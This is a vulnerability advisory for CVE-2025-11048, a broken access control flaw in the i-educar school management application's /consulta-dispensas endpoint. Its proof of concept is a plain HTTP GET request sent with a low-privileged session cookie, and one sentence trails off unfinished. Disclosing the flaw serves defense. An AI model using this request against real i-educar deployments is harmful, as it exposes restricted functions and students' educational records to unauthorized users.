CVE-2025-11048: Broken Access Control in /consulta-dispensas Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-11048

Summary

A Broken Access Control vulnerability was identified in the /consulta-dispensas endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.

Details

Vulnerable Endpoint: GET /consulta-dispensas
Authentication: Required

The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .

PoC

• Authenticate as a non-privileged user.

• Send the following request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

GET /consulta-dispensas HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Cookie: i_educar_session=[low_privileged cookie]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i

• We could observe that we have access to the page and to the function. And, this user, should not do that.

Impact

Broken Access Control vulnerabilities can have severe consequences, including:

• Unauthorized access to restricted functionality;
• Escalation of privileges for low-level users;
• Exposure of sensitive data and potential system compromise;
• Loss of confidentiality and integrity of educational records;
• Reputational damage to the organization.

Reference

https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-11048.md

Finder

Marcelo Queiroz

By: CVE-Hunters